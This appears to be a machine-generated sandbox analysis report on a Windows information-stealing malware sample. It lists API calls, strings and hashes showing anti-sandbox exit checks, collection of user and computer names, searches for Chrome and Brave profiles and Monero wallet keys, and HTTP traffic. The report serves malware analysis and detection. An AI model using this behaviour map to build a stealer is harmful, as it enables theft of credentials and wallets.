                              • Opcode Fuzzy Hash: 8ef1038424ded5a292af9afe512869ab95a23150c589de7f2f239a1e6fa26f2f
                              • Instruction Fuzzy Hash: 3BE15472910104EBCB55FBA0EC5AAFE7378AF95300F908229B50756191EF3C6F59CB92

                              Control-flow Graph

                              • [Graph image: control-flow graph of function 007A17A0 (basic blocks 7a17a0 to 7a19cd), calling StrCmpCA repeatedly and ExitProcess; legend: Executed / Not Executed]
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 007A17C5
                              • ExitProcess.KERNEL32 ref: 007A17D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 92fff3305a9132ec34140b80909fc6b7d143c19e8212e72029fe3bb01ced5571
                              • Instruction ID: ead0c77ef6c8acdb01755072ca7b4ad2e6bf3f3ec029c41b91ad998bccb8d11a
                              • Opcode Fuzzy Hash: 92fff3305a9132ec34140b80909fc6b7d143c19e8212e72029fe3bb01ced5571
                              • Instruction Fuzzy Hash: AF5199B4B04209EBEB04DFA0C854BBF37B9BF85300F508249F806A7290D778E951DB62

                              Control-flow Graph

                              • [Graph image: control-flow graph of function 007A7500 (basic blocks 7a7500 to 7a768e), calling GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap and wsprintfA; legend: Executed / Not Executed]
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 007A7542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007A757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007A7603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A760A
                              • wsprintfA.USER32 ref: 007A7640
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\${
                              • API String ID: 1544550907-1442128683
                              • Opcode ID: 379cb15e6a6036c929e98de950d796a7825c547d46ca5d375d810676352e246e
                              • Instruction ID: d6957c8579491492aa7697de3179b1854bd5a4ec1164ec763d67677678ca84f8
                              • Opcode Fuzzy Hash: 379cb15e6a6036c929e98de950d796a7825c547d46ca5d375d810676352e246e
                              • Instruction Fuzzy Hash: 834183B1E45248EBDB14DF94DC45BEEBBB8AF49700F100199F50967280D778AA84CBA5

                              Control-flow Graph

                              APIs
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C23B0), ref: 007A98A1
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C23C8), ref: 007A98BA
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C2200), ref: 007A98D2
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C23E0), ref: 007A98EA
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C2410), ref: 007A9903
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C8F30), ref: 007A991B
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014B52F0), ref: 007A9933
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014B5390), ref: 007A994C
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C2428), ref: 007A9964
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C2440), ref: 007A997C
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C2458), ref: 007A9995
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C2170), ref: 007A99AD
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014B53F0), ref: 007A99C5
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C21B8), ref: 007A99DE
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007911D0: ExitProcess.KERNEL32 ref: 00791211
                                • Part of subcall function 00791160: GetSystemInfo.KERNEL32(?), ref: 0079116A
                                • Part of subcall function 00791160: ExitProcess.KERNEL32 ref: 0079117E
                                • Part of subcall function 00791110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0079112B
                                • Part of subcall function 00791110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00791132
                                • Part of subcall function 00791110: ExitProcess.KERNEL32 ref: 00791143
                                • Part of subcall function 00791220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0079123E
                                • Part of subcall function 00791220: __aulldiv.LIBCMT ref: 00791258
                                • Part of subcall function 00791220: __aulldiv.LIBCMT ref: 00791266
                                • Part of subcall function 00791220: ExitProcess.KERNEL32 ref: 00791294
                                • Part of subcall function 007A6770: GetUserDefaultLangID.KERNEL32 ref: 007A6774
                                • Part of subcall function 00791190: ExitProcess.KERNEL32 ref: 007911C6
                                • Part of subcall function 007A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007911B7), ref: 007A7880
                                • Part of subcall function 007A7850: RtlAllocateHeap.NTDLL(00000000), ref: 007A7887
                                • Part of subcall function 007A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 007A789F
                                • Part of subcall function 007A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007A7910
                                • Part of subcall function 007A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 007A7917
                                • Part of subcall function 007A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 007A792F
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014C8FF0,?,007B110C,?,00000000,?,007B1110,?,00000000,007B0AEF), ref: 007A6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007A6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 007A6AF9
                              • Sleep.KERNEL32(00001770), ref: 007A6B04
                              • CloseHandle.KERNEL32(?,00000000,?,014C8FF0,?,007B110C,?,00000000,?,007B1110,?,00000000,007B0AEF), ref: 007A6B1A
                              • ExitProcess.KERNEL32 ref: 007A6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 3306c313b559bdbe552b6095f694e17d8184aa584bc2e10c52340092edf030a5
                              • Instruction ID: c898340ee6fe3e613d9a0967f0a73b8b11e7dbec5fc45603042e932084c08025
                              • Opcode Fuzzy Hash: 3306c313b559bdbe552b6095f694e17d8184aa584bc2e10c52340092edf030a5
                              • Instruction Fuzzy Hash: 25314B70954208FADB04FBF0DC5ABEE7778AF86300F504629F202A2192DF7C6941C7A2

                              Control-flow Graph

                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0079123E
                              • __aulldiv.LIBCMT ref: 00791258
                              • __aulldiv.LIBCMT ref: 00791266
                              • ExitProcess.KERNEL32 ref: 00791294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 2ca7aec359c3e0d99a1522ce7c5e3a49bd71f5d4829c0162dda0ea79994eadd4
                              • Instruction ID: 70d0654210a57a7790b959a43d2fcfda863b56fb53957cc7fef7f423f915d3bb
                              • Opcode Fuzzy Hash: 2ca7aec359c3e0d99a1522ce7c5e3a49bd71f5d4829c0162dda0ea79994eadd4
                              • Instruction Fuzzy Hash: 8A016DB0E44308FAEF10EBE0DD49B9EBB78BB44701F608149E706B62C0D7786A518799

                              Control-flow Graph

                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014C8FF0,?,007B110C,?,00000000,?,007B1110,?,00000000,007B0AEF), ref: 007A6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007A6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 007A6AF9
                              • Sleep.KERNEL32(00001770), ref: 007A6B04
                              • CloseHandle.KERNEL32(?,00000000,?,014C8FF0,?,007B110C,?,00000000,?,007B1110,?,00000000,007B0AEF), ref: 007A6B1A
                              • ExitProcess.KERNEL32 ref: 007A6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 4172f4fb8a471e05f65ef22e5d18f34252d31bbeff0c1a3062b5edd38ee39615
                              • Instruction ID: 9922c091587982c6ff08e5f1f4ca8e9f54a74d141bc9fc8928bd016783755a47
                              • Opcode Fuzzy Hash: 4172f4fb8a471e05f65ef22e5d18f34252d31bbeff0c1a3062b5edd38ee39615
                              • Instruction Fuzzy Hash: CBF08270A85209EFE700BBA0DC0ABBE7B74FB86701F248715F513A11C1DBB85580E666

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00794839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00794849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 289c86733190259971e0fffddf387a9fb8ec9952091fa7a34b41d05c819d1133
                              • Instruction ID: fbe6b21524205ed2d85362adfb5434cf40ca35e27609c4c5eb73e2bbb8f85b0f
                              • Opcode Fuzzy Hash: 289c86733190259971e0fffddf387a9fb8ec9952091fa7a34b41d05c819d1133
                              • Instruction Fuzzy Hash: CF213EB1E01209ABDF14DFA4E849BDD7B74FB45320F108625F915A7280DB746A05CB92

                              Control-flow Graph

                              APIs
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 00796280: InternetOpenA.WININET(007B0DFE,00000001,00000000,00000000,00000000), ref: 007962E1
                                • Part of subcall function 00796280: StrCmpCA.SHLWAPI(?,014CEA08), ref: 00796303
                                • Part of subcall function 00796280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00796335
                                • Part of subcall function 00796280: HttpOpenRequestA.WININET(00000000,GET,?,014CE3D0,00000000,00000000,00400100,00000000), ref: 00796385
                                • Part of subcall function 00796280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007963BF
                                • Part of subcall function 00796280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007963D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007A5228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: d8a4e3ffeebc35f294a304605b72d55af8fa43cfe72928d833a90f558c42a9ed
                              • Instruction ID: eba29fa43e15e3308f7bcb79fe746e8a25e0bdb25e61d39795250a99c5913ea3
                              • Opcode Fuzzy Hash: d8a4e3ffeebc35f294a304605b72d55af8fa43cfe72928d833a90f558c42a9ed
                              • Instruction Fuzzy Hash: 08112E70910008FBCB54FF64DD5AAED7378AF91340F808268F80A4A592EF3CAB15C792
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007A7910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A7917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 007A792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 64a02e3bb2521495bf25b343ec704ce1fee4e3509edca6c67d801c8885237137
                              • Instruction ID: 812cafbce98727c268ab10317b74c9f8596ea8cec77a952f182c4d1dc88666dc
                              • Opcode Fuzzy Hash: 64a02e3bb2521495bf25b343ec704ce1fee4e3509edca6c67d801c8885237137
                              • Instruction Fuzzy Hash: E40186B1948204EFC714DF94DD45BABFBB8F745B11F10421AF945E3280C3785940DBA2
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0079112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00791132
                              • ExitProcess.KERNEL32 ref: 00791143
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 1b8c5d0ed868dce07c6af3ba6c4847d58ccc3c0048535de4b2afee570b2a1529
                              • Instruction ID: ff593de007ff964305230fa3aba01f41687e00dd7bacad2c91a337bbfa2cc398
                              • Opcode Fuzzy Hash: 1b8c5d0ed868dce07c6af3ba6c4847d58ccc3c0048535de4b2afee570b2a1529
                              • Instruction Fuzzy Hash: CFE0E6709DA34CFFEB106BA5AC0EB097778AB04B01F504055F709761D0D6B52660A699
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007910B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 007910F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 694f4967f038390d84944a1241095f70c869ca2c314984b230e80d031cb5ba5b
                              • Instruction ID: 0cdaa06019021b348705e899d65c3ba40dc0080e07f3b50d14a7241b33ff9438
                              • Opcode Fuzzy Hash: 694f4967f038390d84944a1241095f70c869ca2c314984b230e80d031cb5ba5b
                              • Instruction Fuzzy Hash: D3F02E71681304BBEB149BA8AC49FBFB7DCD705715F300444F504E3280D5725F40DA51
                              APIs
                                • Part of subcall function 007A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007A7910
                                • Part of subcall function 007A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 007A7917
                                • Part of subcall function 007A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 007A792F
                                • Part of subcall function 007A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007911B7), ref: 007A7880
                                • Part of subcall function 007A7850: RtlAllocateHeap.NTDLL(00000000), ref: 007A7887
                                • Part of subcall function 007A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 007A789F
                              • ExitProcess.KERNEL32 ref: 007911C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 220fe0ae2cf866759274b089c48db29d90f81ebb57f3373286021f9003a8eafe
                              • Instruction ID: 44c2959e468bc8bbe3dab5fbcd3f059b639fbeec48ac925ce29510b53ebcaa35
                              • Opcode Fuzzy Hash: 220fe0ae2cf866759274b089c48db29d90f81ebb57f3373286021f9003a8eafe
                              • Instruction Fuzzy Hash: 44E012B5EA8306E3CE0473B0FC0EB2A339C9B55345F440625FA05D2112FE2DE860D566
                              APIs
                              • wsprintfA.USER32 ref: 007A38CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 007A38E3
                              • lstrcat.KERNEL32(?,?), ref: 007A3935
                              • StrCmpCA.SHLWAPI(?,007B0F70), ref: 007A3947
                              • StrCmpCA.SHLWAPI(?,007B0F74), ref: 007A395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 007A3C67
                              • FindClose.KERNEL32(000000FF), ref: 007A3C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: f5ad04a4c018738bfd989d22f0a75a14cc7a15e7b2d5c57ad15eba058f714620
                              • Instruction ID: 033603023e96f58d870ca669a4e72d5c0d4e819ed28a5b1bf8034a8ac63ba9c7
                              • Opcode Fuzzy Hash: f5ad04a4c018738bfd989d22f0a75a14cc7a15e7b2d5c57ad15eba058f714620
                              • Instruction Fuzzy Hash: 41A143B1A50218DBDB24DFA4DC89FFE7378BB85300F444689B60D96141EB789B94CF62
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • FindFirstFileA.KERNEL32(00000000,?,007B0B32,007B0B2B,00000000,?,?,?,007B13F4,007B0B2A), ref: 0079BEF5
                              • StrCmpCA.SHLWAPI(?,007B13F8), ref: 0079BF4D
                              • StrCmpCA.SHLWAPI(?,007B13FC), ref: 0079BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0079C7BF
                              • FindClose.KERNEL32(000000FF), ref: 0079C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: aa0390bbf4d5eb86efb9bb809708ea89a74e01bc4359af4226b2ff8464f16192
                              • Instruction ID: c1d952dcc84ea76412e194ab6147de66e17ae9add7fbd0091bcee58e1f526cd0
                              • Opcode Fuzzy Hash: aa0390bbf4d5eb86efb9bb809708ea89a74e01bc4359af4226b2ff8464f16192
                              • Instruction Fuzzy Hash: 3D424572910104EBCF54FB70DD9AEEE737DAB95300F408668B50696191EF3CAB49CB92
                              APIs
                              • wsprintfA.USER32 ref: 007A492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 007A4943
                              • StrCmpCA.SHLWAPI(?,007B0FDC), ref: 007A4971
                              • StrCmpCA.SHLWAPI(?,007B0FE0), ref: 007A4987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 007A4B7D
                              • FindClose.KERNEL32(000000FF), ref: 007A4B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 53f3f8ca8185148f6d68500ee014e220fbb53d6f2afe0ef8909ff0fdaba50fc1
                              • Instruction ID: e06ee25fca6c64d6d6177a095ce02548007fb2001271f4b7a4df3b1d21d85bd1
                              • Opcode Fuzzy Hash: 53f3f8ca8185148f6d68500ee014e220fbb53d6f2afe0ef8909ff0fdaba50fc1
                              • Instruction Fuzzy Hash: 406155B1910218ABCB20EBA0DC49FFB737CBB89700F444689B60996141EB75EB95DF91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007A4580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A4587
                              • wsprintfA.USER32 ref: 007A45A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 007A45BD
                              • StrCmpCA.SHLWAPI(?,007B0FC4), ref: 007A45EB
                              • StrCmpCA.SHLWAPI(?,007B0FC8), ref: 007A4601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 007A468B
                              • FindClose.KERNEL32(000000FF), ref: 007A46A0
                              • lstrcat.KERNEL32(?,014CE9C8), ref: 007A46C5
                              • lstrcat.KERNEL32(?,014CD980), ref: 007A46D8
                              • lstrlen.KERNEL32(?), ref: 007A46E5
                              • lstrlen.KERNEL32(?), ref: 007A46F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: b7e0e10d28ff48aa23428da5fc7e3d3556d4ad97c675f4cd6ba6b547ad22ef1d
                              • Instruction ID: 010c0cd5a39fb9402424735e8ad8e532a8f4e74c8aed08c4f0e219b2d0ec66ca
                              • Opcode Fuzzy Hash: b7e0e10d28ff48aa23428da5fc7e3d3556d4ad97c675f4cd6ba6b547ad22ef1d
                              • Instruction Fuzzy Hash: 25517BB19542189BCB60EBB0DC89FEE737CAB94300F404689F60992050EB799BD4DF92
                              APIs
                              • wsprintfA.USER32 ref: 007A3EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 007A3EDA
                              • StrCmpCA.SHLWAPI(?,007B0FAC), ref: 007A3F08
                              • StrCmpCA.SHLWAPI(?,007B0FB0), ref: 007A3F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 007A406C
                              • FindClose.KERNEL32(000000FF), ref: 007A4081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: af15d6fa5f3345f2fb41fb3247b8504ffd76b64b596833760bb483d647fdf604
                              • Instruction ID: a869142fb72d4f444a10dfe0f48b8b0894c5e9102f66fa1eb805330fb10a1dc5
                              • Opcode Fuzzy Hash: af15d6fa5f3345f2fb41fb3247b8504ffd76b64b596833760bb483d647fdf604
                              • Instruction Fuzzy Hash: 81519CB2914218EBCB24EBB0DC49EFA737CBB84300F404689F61992040DB79EB95DF91
                              APIs
                              • wsprintfA.USER32 ref: 0079ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0079ED55
                              • StrCmpCA.SHLWAPI(?,007B1538), ref: 0079EDAB
                              • StrCmpCA.SHLWAPI(?,007B153C), ref: 0079EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0079F2AE
                              • FindClose.KERNEL32(000000FF), ref: 0079F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 16594118a724e20b34d5e1fdc18e428864c235a309f8481e9b3f3b0ac9b30e36
                              • Instruction ID: e9a91142b78fdbdf961f6d73b421aebd325d8e7feb69d9c64d141dacd9836b38
                              • Opcode Fuzzy Hash: 16594118a724e20b34d5e1fdc18e428864c235a309f8481e9b3f3b0ac9b30e36
                              • Instruction Fuzzy Hash: 2DE1C571911118EADB95FB60DC56EEE7378AF95300F4042A9B50B62092EF386F8ACF51
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007B15B8,007B0D96), ref: 0079F71E
                              • StrCmpCA.SHLWAPI(?,007B15BC), ref: 0079F76F
                              • StrCmpCA.SHLWAPI(?,007B15C0), ref: 0079F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0079FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0079FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
